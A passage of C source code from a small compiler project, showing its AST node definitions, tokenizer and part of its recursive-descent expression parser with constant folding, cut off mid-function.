517 | add_symbol_forward(assignto, 0); 518 | emit_store_indirect(assignto); 519 | } else { 520 | BOOL loaded = FALSE; 521 | for (n = n->next; n; n = n->next) { 522 | BOOL later = FALSE; 523 | struct lval_node *p = AS_LVAL(n); 524 | assert(n->type == NODE_LVAL); 525 | if (fast) { 526 | if (optimize_imm && !p->deref && !get_symbol(p->name) && ((p->attr & ATTRIB_CONSTANT) || !inloop)) { 527 | emit_fast(p->name, fast); 528 | add_symbol_defined(p->name, fast, p->attr); 529 | continue; 530 | } 531 | if (!loaded) { 532 | loaded = TRUE; 533 | if (p->deref && !is_loadable_sym(p->name)) { 534 | later = TRUE; 535 | } else { 536 | emit_load_direct(fast, FALSE); 537 | } 538 | } 539 | } 540 | if (p->attr & 
ATTRIB_CONSTANT) { 541 | cry("useless const for '%s'\n", p->name); 542 | } 543 | if (p->deref) { 544 | /* XXX only addresses (imports/vectors) can be derefed */ 545 | if (!is_loadable_sym(p->name)) { 546 | /* XXX ok, this is very very shitty 547 | * tip1: store value to tmp_N for each future p->deref at once 548 | * tip2: calculate in advance how many derefs we will need and store pointers before calculating r0 (see above) 549 | */ 550 | char *ptr = new_name("ptr"); 551 | char *tmp; 552 | if (!later) { 553 | tmp = emit_save(); 554 | } 555 | emit_load_indirect(p->name, FALSE); 556 | emit_store_indirect(ptr); 557 | if (!later) { 558 | emit_restore(tmp); 559 | } else { 560 | emit_load_direct(fast, FALSE); 561 | } 562 | add_symbol_forward(ptr, 0); 563 | make_symbol_used(ptr); 564 | emit_store_direct(ptr); 565 | free(ptr); 566 | } else { 567 | make_symbol_used(p->name); 568 | emit_store_direct(p->name); 569 | } 570 | } else { 571 | add_symbol_forward(p->name, p->attr); 572 | if (try_symbol_extern(p->name)) { 573 | die("cannot assign to import address '%s'\n", p->name); 574 | } 575 | if (optimize_imm && (try_symbol_attr(p->name) & ATTRIB_CONSTANT)) { 576 | die("'%s' was declared constant\n", p->name); 577 | } 578 | emit_store_indirect(p->name); 579 | } 580 | } 581 | if (force && fast && !loaded) { 582 | emit_load_direct(fast, FALSE); 583 | } 584 | } 585 | } 586 | -------------------------------------------------------------------------------- /emit.h: -------------------------------------------------------------------------------- 1 | #ifndef EMIT_H_ 2 | #define EMIT_H_ 3 | 4 | #define AS_CALL(n) ((struct call_node *)(n)) 5 | #define AS_LVAL(n) ((struct lval_node *)(n)) 6 | #define AS_IMM(n) ((struct imm_node *)(n)) 7 | #define AS_OR(n) ((struct or_node *)(n)) 8 | #define AS_XOR(n) ((struct xor_node *)(n)) 9 | #define AS_AND(n) ((struct and_node *)(n)) 10 | #define AS_ADD(n) ((struct add_node *)(n)) 11 | #define AS_MUL(n) ((struct mul_node *)(n)) 12 | 13 | enum node_type 
{ 14 | NODE_IMM, 15 | NODE_LVAL, 16 | NODE_CALL, 17 | NODE_OR, 18 | NODE_XOR, 19 | NODE_AND, 20 | NODE_ADD, 21 | NODE_MUL 22 | }; 23 | 24 | struct node { 25 | struct node *next; 26 | enum node_type type; 27 | int inverse; 28 | }; 29 | 30 | struct call_node { 31 | struct node *next; 32 | enum node_type type; 33 | int inverse; 34 | char *func; 35 | struct node *parm; 36 | int attr, regparm, restack; 37 | }; 38 | 39 | struct lval_node { 40 | struct node *next; 41 | enum node_type type; 42 | int inverse; 43 | char *name; 44 | BOOL deref; 45 | int attr; 46 | }; 47 | 48 | struct imm_node { 49 | struct node *next; 50 | enum node_type type; 51 | int inverse; 52 | char *value; 53 | }; 54 | 55 | struct or_node { 56 | struct node *next; 57 | enum node_type type; 58 | int inverse; 59 | struct node *list; 60 | }; 61 | 62 | struct xor_node { 63 | struct node *next; 64 | enum node_type type; 65 | int inverse; 66 | struct node *list; 67 | }; 68 | 69 | struct and_node { 70 | struct node *next; 71 | enum node_type type; 72 | int inverse; 73 | struct node *list; 74 | }; 75 | 76 | struct add_node { 77 | struct node *next; 78 | enum node_type type; 79 | int inverse; 80 | struct node *list; 81 | }; 82 | 83 | struct mul_node { 84 | struct node *next; 85 | enum node_type type; 86 | int inverse; 87 | struct node *list; 88 | }; 89 | 90 | struct call_node *alloc_call_node(void); 91 | struct imm_node *alloc_imm_node(void); 92 | struct lval_node *alloc_lval_node(void); 93 | struct or_node *alloc_or_node(void); 94 | struct xor_node *alloc_xor_node(void); 95 | struct and_node *alloc_and_node(void); 96 | struct add_node *alloc_add_node(void); 97 | struct mul_node *alloc_mul_node(void); 98 | void free_nodes(struct node *n); 99 | 100 | void walk_nodes(struct node *n, int level); 101 | void emit_nodes(struct node *n, const char *assignto, BOOL force, BOOL inloop); 102 | 103 | #endif 104 | -------------------------------------------------------------------------------- /lexer.c: 
-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "config.h" 6 | #include "util.h" 7 | #include "lexer.h" 8 | 9 | 10 | #define MAXTOK 128 11 | 12 | #define IS_STRING(s) (*(s) == '\"' || *(s) == '\'') 13 | 14 | #define isalph_(c) (isalpha(c) || ((c) == '_')) 15 | #define isalnu_(c) (isalnum(c) || ((c) == '_')) 16 | 17 | 18 | static FILE *source; 19 | static char *saved = NULL; 20 | static char **tokens = NULL; 21 | static int ntok, itok; 22 | struct TOKEN token; 23 | 24 | 25 | static void * 26 | new_token(const char *s, int len) 27 | { 28 | char *p = malloc(len + 1); 29 | if (p) { 30 | memcpy(p, s, len); 31 | p[len] = '\0'; 32 | } 33 | return p; 34 | } 35 | 36 | 37 | int 38 | tokenize(const char *s) 39 | { 40 | const char *last; 41 | 42 | if (!tokens) { 43 | tokens = malloc(MAXTOK * sizeof(char *)); 44 | if (!tokens) { 45 | die("out of memory\n"); 46 | return -1; 47 | } 48 | token.lineno = 0; 49 | } 50 | token.lineno++; 51 | 52 | #ifdef LEXER_READ_CPP 53 | if (s[0] == '#') { 54 | const char *q = s + 1; 55 | int lineno; 56 | char *p; 57 | if (!strncmp(q, "line", 4)) { 58 | q += 4; 59 | } 60 | lineno = strtoul(q, &p, 10); 61 | if (p > q && lineno > 0) { 62 | int stop = ' '; 63 | while (isspace(*p)) { 64 | p++; 65 | } 66 | if (IS_STRING(p)) { 67 | stop = *p++; 68 | } 69 | for (q = p; *q && *q != stop; q++) { 70 | if (*q == '\\' && q[1]) { 71 | q++; 72 | } 73 | } 74 | free(token.filename); 75 | token.filename = new_token(p, q - p); 76 | token.lineno = lineno - 1; 77 | s = q + strlen(q); 78 | } 79 | } 80 | #endif 81 | 82 | for (ntok = 0; *s; s++) { 83 | char *p; 84 | if (*s == '/' && s[1] == '/') { 85 | break; 86 | } 87 | if (isspace(*s)) { 88 | continue; 89 | } 90 | last = s; 91 | 92 | switch (*s) { 93 | case ':': 94 | case ';': 95 | case ',': 96 | case '{': 97 | case '}': 98 | case '[': 99 | case ']': 100 | case '(': 101 | case ')': 102 | case '=': 103 | case '!': 104 | case 
'+': 105 | case '-': 106 | case '*': 107 | case '/': 108 | case '|': 109 | case '^': 110 | case '&': 111 | case '@': 112 | break; 113 | default: 114 | if (IS_STRING(s)) { 115 | int quote = *s; 116 | while (*++s && *s != quote) { 117 | if (*s == '\\' && !*++s) { 118 | goto err_syntax; 119 | } 120 | } 121 | if (s[0] != quote) { 122 | goto err_syntax; 123 | } 124 | } else if (isdigit(*s)) { 125 | strtoul(s, &p, 0); 126 | if (isalph_(*p)) { 127 | goto err_syntax; 128 | } 129 | s = p - 1; 130 | } else if (isalph_(*s)) { 131 | while (isalnu_(s[1])) { 132 | s++; 133 | } 134 | } else { 135 | goto err_syntax; 136 | } 137 | } 138 | if (ntok >= MAXTOK) { 139 | die("too many tokens\n"); 140 | goto err; 141 | } 142 | p = new_token(last, s + 1 - last); 143 | if (!p) { 144 | die("out of memory\n"); 145 | goto err; 146 | } 147 | tokens[ntok++] = p; 148 | } 149 | itok = 0; 150 | return ntok; 151 | err_syntax: 152 | die("invalid token %s\n", last); 153 | err: 154 | while (--ntok >= 0) { 155 | free(tokens[ntok]); 156 | } 157 | return -1; 158 | } 159 | 160 | 161 | void 162 | free_tokens(BOOL full) 163 | { 164 | while (--ntok >= 0) { 165 | free(tokens[ntok]); 166 | } 167 | if (full) { 168 | free(saved); 169 | saved = NULL; 170 | free(tokens); 171 | tokens = NULL; 172 | free(token.filename); 173 | token.filename = NULL; 174 | } 175 | } 176 | 177 | 178 | void 179 | init_tokens(void *p) 180 | { 181 | source = p; 182 | } 183 | 184 | 185 | static void 186 | fetch_tokens(void) 187 | { 188 | char buf[BUFSIZ]; 189 | if (!source || itok < ntok) { 190 | return; 191 | } 192 | if (token.sym && (!saved || strcmp(token.sym, saved))) { 193 | token.sym = strdup(token.sym); 194 | if (!token.sym) { 195 | die("out of memory\n"); 196 | } 197 | free(saved); 198 | saved = (char *)token.sym; 199 | } 200 | free_tokens(FALSE); 201 | while (fgets(buf, sizeof(buf), source) && tokenize(buf) == 0) { 202 | } 203 | } 204 | 205 | 206 | static enum TOKTYPE 207 | eval_token(const char *s) 208 | { 209 | enum TOKTYPE 
type; 210 | if (!strcmp(s, "if")) { 211 | type = T_K_IF; 212 | } else if (!strcmp(s, "else")) { 213 | type = T_K_ELSE; 214 | } else if (!strcmp(s, "do")) { 215 | type = T_K_DO; 216 | } else if (!strcmp(s, "while")) { 217 | type = T_K_WHILE; 218 | } else if (!strcmp(s, "break")) { 219 | type = T_K_BREAK; 220 | } else if (!strcmp(s, "continue")) { 221 | type = T_K_CONTINUE; 222 | } else if (!strcmp(s, "goto")) { 223 | type = T_K_GOTO; 224 | } else if (!strcmp(s, "const")) { 225 | type = T_K_CONST; 226 | } else if (!strcmp(s, "extern")) { 227 | type = T_K_EXTERN; 228 | } else if (!strcmp(s, "volatile")) { 229 | type = T_K_VOLATILE; 230 | } else if (!strcmp(s, ":")) { 231 | type = T_COLON; 232 | } else if (!strcmp(s, ";")) { 233 | type = T_SEMICOLON; 234 | } else if (!strcmp(s, ",")) { 235 | type = T_COMMA; 236 | } else if (!strcmp(s, "{")) { 237 | type = T_OPENCURLY; 238 | } else if (!strcmp(s, "}")) { 239 | type = T_CLOSECURLY; 240 | } else if (!strcmp(s, "[")) { 241 | type = T_OPENSQUARE; 242 | } else if (!strcmp(s, "]")) { 243 | type = T_CLOSESQUARE; 244 | } else if (!strcmp(s, "(")) { 245 | type = T_OPENBRACE; 246 | } else if (!strcmp(s, ")")) { 247 | type = T_CLOSEBRACE; 248 | } else if (!strcmp(s, "=")) { 249 | type = T_ASSIGN; 250 | } else if (!strcmp(s, "!")) { 251 | type = T_LOGICNOT; 252 | } else if (!strcmp(s, "+")) { 253 | type = T_ADD; 254 | } else if (!strcmp(s, "-")) { 255 | type = T_SUB; 256 | } else if (!strcmp(s, "*")) { 257 | type = T_MUL; 258 | } else if (!strcmp(s, "/")) { 259 | type = T_DIV; 260 | } else if (!strcmp(s, "|")) { 261 | type = T_OR; 262 | } else if (!strcmp(s, "^")) { 263 | type = T_XOR; 264 | } else if (!strcmp(s, "&")) { 265 | type = T_AND; 266 | } else if (!strcmp(s, "@")) { 267 | type = T_AT; 268 | #ifdef LEXER_APOS_INT 269 | } else if (*s == '\'') { 270 | type = T_INT; 271 | #endif 272 | } else if (IS_STRING(s)) { 273 | type = T_STRING; 274 | } else if (isdigit(*s)) { 275 | type = T_INT; 276 | } else { 277 | type = T_ID; 278 | } 
279 | return type; 280 | } 281 | 282 | 283 | void 284 | next_token(void) 285 | { 286 | token.sym = NULL; 287 | token.type = T_EOI; 288 | fetch_tokens(); 289 | if (itok < ntok) { 290 | token.sym = tokens[itok++]; 291 | token.type = eval_token(token.sym); 292 | #ifdef LEXER_APOS_INT 293 | if (token.type == T_INT && token.sym[0] == '\'') { 294 | char buf[32]; 295 | unsigned i, j; 296 | const char *s = token.sym; 297 | unsigned long long val = 0; 298 | for (i = 1, j = 0; s[i] != '\''; i++, j++) { 299 | int ch = s[i]; 300 | if (ch == '\\') { 301 | switch (s[++i]) { 302 | case '0': ch = 0; break; 303 | case 'n': ch = '\n'; break; 304 | case 't': ch = '\t'; break; 305 | case '\\': break; 306 | default: 307 | j = 8; 308 | } 309 | } 310 | val = (val << 8) | ch; 311 | } 312 | if (j == 0 || j > 8) { 313 | die("bad multichar: %s\n", token.sym); 314 | } 315 | sprintf(buf, "0x%llx", val); 316 | token.sym = strdup(buf); 317 | if (!token.sym) { 318 | die("out of memory\n"); 319 | } 320 | free(tokens[--itok]); 321 | tokens[itok++] = (char *)token.sym; 322 | } 323 | #endif 324 | #ifdef LEXER_STR_MERGE 325 | while (token.type == T_STRING && peek_token() == T_STRING) { 326 | const char *str1 = token.sym; 327 | const char *str2 = tokens[itok]; 328 | size_t str1_len = strlen(str1); 329 | size_t str2_len = strlen(str2); 330 | char *buf = malloc(str1_len + str2_len - 1); 331 | if (!buf) { 332 | cry("out of memory\n"); 333 | break; 334 | } 335 | memcpy(buf, str1, str1_len - 1); 336 | memcpy(buf + str1_len - 1, str2 + 1, str2_len - 2); 337 | buf[str1_len + str2_len - 3] = *buf; 338 | buf[str1_len + str2_len - 2] = '\0'; 339 | free(tokens[itok]); 340 | token.sym = tokens[itok++] = buf; 341 | } 342 | #endif 343 | #ifdef LEXER_DEBUG 344 | printf(";// token %s <%d>\n", token.sym, token.type); 345 | #endif 346 | } 347 | } 348 | 349 | 350 | enum TOKTYPE 351 | peek_token(void) 352 | { 353 | enum TOKTYPE type = T_EOI; 354 | fetch_tokens(); 355 | if (itok < ntok) { 356 | type = 
eval_token(tokens[itok]); 357 | } 358 | return type; 359 | } 360 | -------------------------------------------------------------------------------- /lexer.h: -------------------------------------------------------------------------------- 1 | #ifndef LEXER_H_ 2 | #define LEXER_H_ 3 | 4 | enum TOKTYPE { 5 | T_COLON, /* : */ 6 | T_SEMICOLON, /* ; */ 7 | T_COMMA, /* , */ 8 | T_OPENCURLY, /* { */ 9 | T_CLOSECURLY, /* } */ 10 | T_OPENSQUARE, /* [ */ 11 | T_CLOSESQUARE, /* ] */ 12 | T_OPENBRACE, /* ( */ 13 | T_CLOSEBRACE, /* ) */ 14 | T_ASSIGN, /* = */ 15 | T_LOGICNOT, /* ! */ 16 | T_ADD, /* + */ 17 | T_SUB, /* - */ 18 | T_MUL, /* * alias to pointer */ 19 | T_DIV, /* / */ 20 | T_OR, /* | */ 21 | T_XOR, /* ^ */ 22 | T_AND, /* & alias to address */ 23 | T_AT, /* @ */ 24 | 25 | T_ID, /* identifier */ 26 | T_STRING, /* string constant */ 27 | T_INT, /* integer constant */ 28 | 29 | T_K_IF, 30 | T_K_ELSE, 31 | T_K_DO, 32 | T_K_WHILE, 33 | T_K_BREAK, 34 | T_K_CONTINUE, 35 | T_K_GOTO, 36 | T_K_CONST, 37 | T_K_EXTERN, 38 | T_K_VOLATILE, 39 | 40 | T_EOI, /* end-of-input */ 41 | 42 | T_UNKNOWN 43 | }; 44 | 45 | struct TOKEN { 46 | enum TOKTYPE type; 47 | const char *sym; 48 | int lineno; 49 | char *filename; 50 | }; 51 | 52 | extern struct TOKEN token; 53 | 54 | void init_tokens(void *p); 55 | int tokenize(const char *s); 56 | void next_token(void); 57 | enum TOKTYPE peek_token(void); 58 | void free_tokens(BOOL full); 59 | 60 | #endif 61 | -------------------------------------------------------------------------------- /parser.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "config.h" 6 | #include "util.h" 7 | #include "parser.h" 8 | #include "lexer.h" 9 | #include "emit.h" 10 | #include "code.h" 11 | #include "backend.h" 12 | #include "symtab.h" 13 | 14 | 15 | #define IS(t) (token.type == (t)) 16 | 17 | 18 | #ifdef PARSER_DEBUG 19 | #define ENTER() printf("%*c %s(%s)\n", 2 * 
logindent++, ';', __FUNCTION__, token.sym) 20 | #define LEAVE() --logindent 21 | static int logindent = 0; 22 | #else 23 | #define ENTER() 24 | #define LEAVE() 25 | #endif 26 | 27 | 28 | static void __attribute__((noreturn)) 29 | expect(const char *what) 30 | { 31 | const char *sym = token.sym; 32 | if (IS(T_EOI)) { 33 | sym = "end of input"; 34 | } 35 | die("expected %s before %s\n", what, sym); 36 | } 37 | 38 | 39 | static struct node *R_or_exp(struct the_node *the_node); 40 | static struct imm_node *R_immediate_exp(const char *death); 41 | static void R_stat(struct the_node *the_node, struct the_node *ante, struct the_node *post); 42 | 43 | 44 | static int 45 | R_attribute(int allow, int *regparm, int *restack) 46 | { 47 | int attr = 0; 48 | char *sym = xstrdup(token.sym); 49 | ENTER(); 50 | if (!IS(T_ID)) { 51 | expect("attribute"); 52 | } 53 | if (!strcmp(sym, "noreturn")) { 54 | attr = ATTRIB_NORETURN; 55 | } else if (!strcmp(sym, "stdcall")) { 56 | attr = ATTRIB_STDCALL; 57 | } else if (!strcmp(sym, "stack")) { 58 | if (peek_token() == T_ASSIGN) { 59 | long n; 60 | next_token(); /* skip 'stack' */ 61 | next_token(); /* skip '=' */ 62 | if (!IS(T_INT)) { 63 | expect("integer"); 64 | } 65 | n = strtol(token.sym, NULL, 0); 66 | if (n > 0 && n <= 0x8000) { 67 | *restack = n; 68 | } else { 69 | cry("invalid restack value %ld, using defaults\n", n); 70 | } 71 | } 72 | attr = ATTRIB_STACK; 73 | } else if (!strcmp(sym, "regparm")) { 74 | long n; 75 | next_token(); /* skip 'regparm' */ 76 | if (!IS(T_ASSIGN)) { 77 | expect("'='"); 78 | } 79 | next_token(); /* skip '=' */ 80 | if (!IS(T_INT)) { 81 | expect("integer"); 82 | } 83 | n = strtol(token.sym, NULL, 10); 84 | if (n >= 0 && n <= 8) { 85 | *regparm = n; 86 | attr = ATTRIB_REGPARM; 87 | } 88 | } else { 89 | expect("attribute"); 90 | } 91 | if (!(allow & attr)) { 92 | cry("ignoring attribute '%s'\n", sym); 93 | attr = ATTRIB_UNKNOWN; 94 | } 95 | next_token(); /* skip attribute */ 96 | free(sym); 97 | LEAVE(); 98 | 
return attr; 99 | } 100 | 101 | 102 | static int 103 | R_attribute_list(int allow, int *regparm, int *restack) 104 | { 105 | int attr; 106 | ENTER(); 107 | attr = R_attribute(allow, regparm, restack); 108 | while (IS(T_COMMA)) { 109 | next_token(); /* skip ',' */ 110 | attr |= R_attribute(allow, regparm, restack); 111 | } 112 | LEAVE(); 113 | return attr; 114 | } 115 | 116 | 117 | static int 118 | R_attribute_spec(int allow, int *regparm, int *restack) 119 | { 120 | int attr = 0; 121 | ENTER(); 122 | if (IS(T_OPENSQUARE) && peek_token() == T_OPENSQUARE) { 123 | next_token(); /* skip '[' */ 124 | next_token(); /* skip '[' */ 125 | attr = R_attribute_list(allow, regparm, restack); 126 | if (!IS(T_CLOSESQUARE)) { 127 | expect("']'"); 128 | } 129 | next_token(); /* skip ']' */ 130 | if (!IS(T_CLOSESQUARE)) { 131 | expect("']'"); 132 | } 133 | next_token(); /* skip ']' */ 134 | } 135 | LEAVE(); 136 | return attr; 137 | } 138 | 139 | 140 | static struct node * 141 | R_initializer_list(int *num) 142 | { 143 | struct node *n, *p; 144 | ENTER(); 145 | n = (struct node *)R_immediate_exp("immediate"); 146 | *num = 1; 147 | for (p = n; IS(T_COMMA); p = p->next) { 148 | next_token(); /* skip ',' */ 149 | p->next = (struct node *)R_immediate_exp("immediate"); 150 | (*num)++; 151 | } 152 | LEAVE(); 153 | return n; 154 | } 155 | 156 | 157 | static struct imm_node * 158 | R_immediate_exp(const char *death) 159 | { 160 | struct imm_node *n = alloc_imm_node(); 161 | BOOL negative = FALSE; 162 | ENTER(); 163 | if (IS(T_AND)) { 164 | next_token(); /* skip '&' */ 165 | if (!IS(T_ID)) { 166 | expect("identifier"); 167 | } 168 | n->value = create_address_str(token.sym, 0); 169 | next_token(); /* skip ID */ 170 | LEAVE(); 171 | return n; 172 | } 173 | if (IS(T_AT) && enable_cfstr) { 174 | char buf[32]; 175 | const char **args; 176 | next_token(); /* skip '@' */ 177 | if (!IS(T_STRING)) { 178 | expect("string"); 179 | } 180 | sprintf(buf, "%zu", strlen(token.sym) - 2); 181 | args = 
xmalloc(4 * sizeof(char *)); 182 | if (!try_symbol_extern("__CFConstantStringClassReference")) { 183 | die("__CFConstantStringClassReference not imported\n"); 184 | } 185 | args[0] = xstrdup("__CFConstantStringClassReference"); 186 | args[1] = xstrdup("0x7c8"); 187 | args[2] = create_address_str(add_string(token.sym), 0); 188 | args[3] = xstrdup(buf); 189 | n->value = create_address_str(add_vector(args, 4), 0); 190 | next_token(); /* skip STRING */ 191 | LEAVE(); 192 | return n; 193 | } 194 | if (IS(T_STRING)) { 195 | n->value = create_address_str(add_string(token.sym), 0); 196 | next_token(); /* skip STRING */ 197 | LEAVE(); 198 | return n; 199 | } 200 | if (IS(T_OPENCURLY)) { 201 | int i; 202 | struct node *p; 203 | const char **args; 204 | next_token(); /* skip '{' */ 205 | p = R_initializer_list(&i); 206 | args = xmalloc(i * sizeof(char *)); 207 | for (i = 0; p; i++) { 208 | struct node *next = p->next; 209 | args[i] = AS_IMM(p)->value; 210 | free(p); 211 | p = next; 212 | } 213 | n->value = create_address_str(add_vector(args, i), 0); 214 | if (!IS(T_CLOSECURLY)) { 215 | expect("'}'"); 216 | } 217 | next_token(); /* skip '}' */ 218 | LEAVE(); 219 | return n; 220 | } 221 | if (IS(T_ADD) || IS(T_SUB)) { 222 | if (IS(T_SUB)) { 223 | negative = TRUE; 224 | } 225 | next_token(); /* skip '+'/'-' */ 226 | if (!IS(T_INT)) { 227 | expect("number"); 228 | } 229 | } 230 | if (IS(T_INT)) { 231 | n->value = create_number_str(negative, token.sym); 232 | next_token(); /* skip NUMBER */ 233 | LEAVE(); 234 | return n; 235 | } 236 | if (IS(T_ID) && try_symbol_extern(token.sym)) { 237 | /* XXX this should be kept as an address, but we don't keep it as such... 238 | * for this reason, we must deal with externs later when emitting code :\ 239 | * if we ever decide to treat it as an address, care must be taken during 240 | * constant folding phase: local and extern addresses cannot be mixed etc. 
241 | */ 242 | n->value = xstrdup(token.sym); 243 | next_token(); /* skip ID */ 244 | LEAVE(); 245 | return n; 246 | } 247 | expect(death); 248 | } 249 | 250 | 251 | static int 252 | R_type_qualifier(void) 253 | { 254 | int attr = 0; 255 | ENTER(); 256 | for (;;) { 257 | if (IS(T_K_CONST)) { 258 | next_token(); /* skip 'const' */ 259 | attr |= ATTRIB_CONSTANT; 260 | continue; 261 | } 262 | if (IS(T_K_VOLATILE)) { 263 | next_token(); /* skip 'volatile' */ 264 | attr |= ATTRIB_VOLATILE; 265 | continue; 266 | } 267 | break; 268 | } 269 | LEAVE(); 270 | return attr; 271 | } 272 | 273 | 274 | static struct lval_node * 275 | R_lvalue_exp(void) 276 | { 277 | struct lval_node *n; 278 | BOOL deref = FALSE; 279 | int attr = 0; 280 | ENTER(); 281 | if (IS(T_MUL)) { 282 | next_token(); /* skip '*' */ 283 | deref = TRUE; 284 | } else { 285 | attr = R_type_qualifier(); 286 | } 287 | if (!IS(T_ID)) { 288 | if (!attr && !deref) { 289 | LEAVE(); 290 | return NULL; 291 | } 292 | expect("identifier"); 293 | } 294 | if (all_volatile && !attr && !deref) { 295 | attr = ATTRIB_VOLATILE; 296 | } 297 | n = alloc_lval_node(); 298 | n->name = xstrdup(token.sym); 299 | n->deref = deref; 300 | n->attr = attr; 301 | next_token(); /* skip ID */ 302 | LEAVE(); 303 | return n; 304 | } 305 | 306 | 307 | static struct node * 308 | R_argument_exp_list(struct the_node *the_node) 309 | { 310 | struct node *n, *p; 311 | ENTER(); 312 | n = R_or_exp(the_node); 313 | for (p = n; IS(T_COMMA); p = p->next) { 314 | next_token(); /* skip ',' */ 315 | p->next = R_or_exp(the_node); 316 | } 317 | LEAVE(); 318 | return n; 319 | } 320 | 321 | 322 | static struct node * 323 | R_rvalue_exp(struct the_node *the_node) 324 | { 325 | struct node *n; 326 | int attr, regparm = -1, restack = -1; 327 | ENTER(); 328 | attr = R_attribute_spec(ATTRIB_NORETURN | ATTRIB_STDCALL | ATTRIB_STACK | ATTRIB_REGPARM, ®parm, &restack); 329 | if (IS(T_ID) && peek_token() == T_OPENBRACE) { 330 | struct call_node *f = alloc_call_node(); 331 
| attr |= try_symbol_attr(token.sym); 332 | the_node->attr = attr; 333 | f->func = xstrdup(token.sym); 334 | f->parm = NULL; 335 | f->attr = attr; 336 | f->regparm = regparm; 337 | f->restack = restack; 338 | next_token(); /* skip ID */ 339 | next_token(); /* skip '(' */ 340 | if (!IS(T_CLOSEBRACE)) { 341 | f->parm = R_argument_exp_list(the_node); 342 | } 343 | if (!IS(T_CLOSEBRACE)) { 344 | expect("')'"); 345 | } 346 | next_token(); /* skip ')' */ 347 | n = (struct node *)f; 348 | } else if (attr) { 349 | expect("function call"); 350 | } else if (IS(T_OPENBRACE)) { 351 | next_token(); /* skip '(' */ 352 | n = (struct node *)R_or_exp(the_node); 353 | if (!IS(T_CLOSEBRACE)) { 354 | expect("')'"); 355 | } 356 | next_token(); /* skip ')' */ 357 | } else { 358 | /* XXX consume any extern now, to prevent constant folding */ 359 | n = (struct node *)R_lvalue_exp(); 360 | if (!n) { 361 | n = (struct node *)R_immediate_exp("expression"); 362 | } 363 | } 364 | LEAVE(); 365 | return n; 366 | } 367 | 368 | 369 | static struct node * 370 | R_multiplicative_exp(struct the_node *the_node) 371 | { 372 | struct mul_node *n; 373 | struct node *p, *q; 374 | ENTER(); 375 | n = alloc_mul_node(); 376 | n->list = R_rvalue_exp(the_node); 377 | for (p = n->list; IS(T_MUL) || IS(T_DIV); ) { 378 | int negative = IS(T_DIV); 379 | next_token(); /* skip '*' */ 380 | q = R_rvalue_exp(the_node); 381 | q->inverse = negative; 382 | negative ^= p->inverse; 383 | /* XXX division is not allowed here: x / 3 * 3 would be converted to x / (3 / 3) which is not what we want */ 384 | if (optimize_add && p->type == NODE_IMM && q->type == NODE_IMM && !is_address(AS_IMM(p)->value) && !is_address(AS_IMM(q)->value) && !negative) { 385 | char *v1 = AS_IMM(p)->value; 386 | char *v2 = AS_IMM(q)->value; 387 | AS_IMM(p)->value = create_op_str(v1, v2, negative ? 
'/' : '*'); 388 | free(v1); 389 | free(v2); 390 | free(q); 391 | continue; 392 | } 393 | p->next = q; 394 | p = p->next; 395 | } 396 | if (n->list->next == NULL) { 397 | /* reduce multiplicative to simple factor if possible */ 398 | p = (struct node *)n; 399 | n = (struct mul_node *)n->list; 400 | free(p); 401 | } 402 | LEAVE(); 403 | return (struct node *)n; 404 | } 405 | 406 | 407 | static struct node * 408 | R_additive_exp(struct the_node *the_node) 409 | { 410 | struct add_node *n; 411 | struct node *p, *q; 412 | ENTER(); 413 | n = alloc_add_node(); 414 | n->list = R_multiplicative_exp(the_node); 415 | for (p = n->list; IS(T_ADD) || IS(T_SUB); ) { 416 | int negative = IS(T_SUB); 417 | next_token(); /* skip '+' */ 418 | q = R_multiplicative_exp(the_node); 419 | q->inverse = negative; 420 | negative ^= p->inverse; 421 | /* XXX TODO a proper constant folding pass */ 422 | if (optimize_add && p->type == NODE_IMM && q->type == NODE_IMM && ((!is_address(AS_IMM(p)->value) ^ negative) | !is_address(AS_IMM(q)->value))) { 423 | char *v1 = AS_IMM(p)->value; 424 | char *v2 = AS_IMM(q)->value; 425 | if (is_address(v1) && is_address(v2)) { 426 | char *c1 = curate_address(v1); 427 | char *c2 = curate_address(v2); 428 | free(v1); 429 | free(v2); 430 | v1 = c1; 431 | v2 = c2; 432 | } 433 | AS_IMM(p)->value = create_op_str(v1, v2, negative ? 
'-' : '+'); 434 | free(v1); 435 | free(v2); 436 | free(q); 437 | continue; 438 | } 439 | p->next = q; 440 | p = p->next; 441 | } 442 | if (n->list->next == NULL) { 443 | /* reduce additive to simple term if possible */ 444 | p = (struct node *)n; 445 | n = (struct add_node *)n->list; 446 | free(p); 447 | } 448 | LEAVE(); 449 | return (struct node *)n; 450 | } 451 | 452 | 453 | static struct node * 454 | R_and_exp(struct the_node *the_node) 455 | { 456 | struct and_node *n; 457 | struct node *p, *q; 458 | ENTER(); 459 | n = alloc_and_node(); 460 | n->list = R_additive_exp(the_node); 461 | for (p = n->list; IS(T_AND); ) { 462 | next_token(); /* skip '&' */ 463 | q = R_additive_exp(the_node); 464 | if (optimize_add && p->type == NODE_IMM && q->type == NODE_IMM && !is_address(AS_IMM(p)->value) && !is_address(AS_IMM(q)->value)) { 465 | char *v1 = AS_IMM(p)->value; 466 | char *v2 = AS_IMM(q)->value; 467 | AS_IMM(p)->value = create_op_str(v1, v2, '&'); 468 | free(v1); 469 | free(v2); 470 | free(q); 471 | continue; 472 | } 473 | p->next = q; 474 | p = p->next; 475 | } 476 | if (n->list->next == NULL) { 477 | /* reduce and to simple factor if possible */ 478 | p = (struct node *)n; 479 | n = (struct and_node *)n->list; 480 | free(p); 481 | } 482 | LEAVE(); 483 | return (struct node *)n; 484 | } 485 | 486 | 487 | static struct node * 488 | R_xor_exp(struct the_node *the_node) 489 | { 490 | struct xor_node *n; 491 | struct node *p, *q; 492 | ENTER(); 493 | n = alloc_xor_node(); 494 | n->list = R_and_exp(the_node); 495 | for (p = n->list; IS(T_XOR); ) { 496 | next_token(); /* skip '^' */ 497 | q = R_and_exp(the_node); 498 | if (optimize_add && p->type == NODE_IMM && q->type == NODE_IMM && !is_address(AS_IMM(p)->value) && !is_address(AS_IMM(q)->value)) { 499 | char *v1 = AS_IMM(p)->value; 500 | char *v2 = AS_IMM(q)->value; 501 | AS_IMM(p)->value = create_op_str(v1, v2, '^'); 502 | free(v1); 503 | free(v2); 504 | free(q); 505 | continue; 506 | } 507 | p->next = q; 508 | p = 
